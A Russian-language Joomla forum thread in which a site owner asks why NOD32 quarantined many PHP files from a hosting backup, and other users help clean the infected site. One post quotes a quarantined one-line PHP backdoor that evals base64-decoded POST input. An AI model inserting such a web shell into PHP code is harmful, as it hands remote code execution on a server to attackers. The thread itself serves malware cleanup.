Форум русской поддержки Joomla!® CMS
06.12.2016, 10:07:48 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Почему NOD32 отправляет некоторые файлы php в карантин, а некоторые нет?

 (Прочитано 589 раз)
0 Пользователей и 1 Гость смотрят эту тему.
tmpnikl
Давно я тут
****

Репутация: +2/-0
Offline Offline

Сообщений: 238


« : 13.05.2015, 07:43:17 »

начал распаковывать архив скаченный с хоста то половина файлов php попали в карантин с сообщением PHP/Kriptik.AL троянская программа..., в инете кто что пишет, кто пишет, что антивирусники если видят 64 й код, то сразу в карантин, не раскодируя, другие, что лучше удалить..., кто что посоветует?
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #1 : 13.05.2015, 08:45:55 »

Стандарт- антивирус выявил файл с вредоносным кодом.Но код может быть вставлен в нормальный скрипт Joomla/расширения. Поэтому, чтобы сохранить работоспособность сайта, нужно каждый файл сравнивать или заменять, с аналогичным из чистого дистра Joomla.
Или если есть опыт, самостоятельно проверять файл и удалять вредоносный код.
Записан
vipiusss
Профи
********

Репутация: +260/-8
Offline Offline

Пол: Мужской
Сообщений: 4571


Skype: renor_


« Ответ #2 : 13.05.2015, 09:16:48 »

1.Не качайте с хоста, есть сайты разработчиков.Вот почему вы верите вашему хосту, а потом темы такие создаёте?
2.Отключите НОД и в нотепаге++ в поиске найдите ваш код
Записан
tmpnikl
Давно я тут
****

Репутация: +2/-0
Offline Offline

Сообщений: 238


« Ответ #3 : 13.05.2015, 13:39:34 »

Я проверил ссылку на сайт д.вебом он лайн, чисто, на хосте антивирусником, тоже чисто, и поэтому немного непонятно, какие должны быть правильные действия..., например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
Joomla я скачал с сайта разработчика, и что я должен проверить каждый файл на base64 и раскодировать?
не могу понять, что сделал не так и что надо сделать? т.к. я ничего не откуда не качал кроме Joomla...
PS: Файлов в карантине больше 100 и каждый проверять и раскодировать ..сложновато...
Записан
aspidy
Живу я здесь
******

Репутация: +55/-1
Offline Offline

Пол: Мужской
Сообщений: 1072


Миграция joomla 1.0-1.5-2.5


« Ответ #4 : 13.05.2015, 15:15:48 »

Или учится самому http://joomlaforum.ru/index.php?topic=239756.0  как убирать вредоносный код или обращаться к специалистам http://joomlaforum.ru/index.php/topic,282477.0.htmlhttp://joomlaforum.ru/index.php/topic,254903.0.html
Записан
tmpnikl
Давно я тут
****

Репутация: +2/-0
Offline Offline

Сообщений: 238


« Ответ #5 : 13.05.2015, 19:28:44 »

спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...
Записан
aspidy
Живу я здесь
******

Репутация: +55/-1
Offline Offline

Пол: Мужской
Сообщений: 1072


Миграция joomla 1.0-1.5-2.5


« Ответ #6 : 14.05.2015, 06:24:58 »

спасибо, понятно... Остался один вопрос... этот код однозначно вирус, и тогда я занимаюсь лечением... или это может быть закодированным куском программы(сайт работает и пока проблем не вижу)?, и тогда я занимаюсь изучением замены кода...
По одной строчке сложно сказать, но скорее всего вирус. Посмотрите логи, htaccess прогоните сканером. Тогда будет более понятно
Записан
tmpnikl
Давно я тут
****

Репутация: +2/-0
Offline Offline

Сообщений: 238


« Ответ #7 : 14.05.2015, 06:41:08 »

Понял, однозначного ответа нет, надо смотреть...блин, но с каждым ответом появляются другие вопросы...
Если это может быть не вирус, следовательно это может быть кусок кода программы... Каким образом этот код предстал в таком виде?, из-за какого-нибудь конвертера или ещё как...
Надо ли этот код переконвертировать обратно в обычный код и как это делается(хотя бы  ссылку почитать)
Каким сканером прогонять .htaccess(он у меня в таком виде), т.к. артивирусники ничего плохого в нем не увидели, может это Неправильные антивирусники, и для htaccess, нужен особый сканер...вот этот файл, что в нем может быть опасного...
Показать текстовый блок


И последнее какие логи смотреть, в какой папке и на предмет чего.... посмотреть то посмотрю, но какие строчки в нем искать непонятно... что должно вызвать подозрительность при просмотре логов...
во ещё один файл нашел по пути ....ru\administrator\components\com_joomlapack\backup\.htaccess
deny from all
« Последнее редактирование: 14.05.2015, 06:46:03 от tmpnikl » Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2652


step by step


« Ответ #8 : 14.05.2015, 06:46:54 »

например вытащил из карантина из папки модули файл, в котором написано
<?php eval(base64_decode($_POST['n726b60']));?>
это вирус.Такой код  в файле дописан или просто файл
Записан
aspidy
Живу я здесь
******

Репутация: +55/-1
Offline Offline

Пол: Мужской
Сообщений: 1072


Миграция joomla 1.0-1.5-2.5


« Ответ #9 : 14.05.2015, 09:24:59 »

Сканер http://joomlaforum.ru/index.php/topic,198048.0.html Поищите по форуму сканеров много
Логи смотрите последние, откуда идут подозрительные движения. Например попытка доступа к админ части. Но логи могут не давать полной картины, если взлом произошёл давно.
Под спойлером стандартный htaccess сравнивайте
Показать текстовый блок
Записан
tmpnikl
Давно я тут
****

Репутация: +2/-0
Offline Offline

Сообщений: 238


« Ответ #10 : 14.05.2015, 09:34:37 »

спасибо, буду смотреть..., а htaccess, что у вас в спулере, что у меня в спулере идентичны...
Записан
aspidy
Живу я здесь
******

Репутация: +55/-1
Offline Offline

Пол: Мужской
Сообщений: 1072


Миграция joomla 1.0-1.5-2.5


« Ответ #11 : 14.05.2015, 10:02:57 »

Проверяйте этот \administrator\components\com_joomlapack\backup\.htaccess
Записан
tmpnikl
Давно я тут
****

Репутация: +2/-0
Offline Offline

Сообщений: 238


« Ответ #12 : 14.05.2015, 12:44:49 »

А что его проверять, выше я написал, что там одна строчка...
deny from all
Запретить всем.... А должно быть так или нет... я не знаю...
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet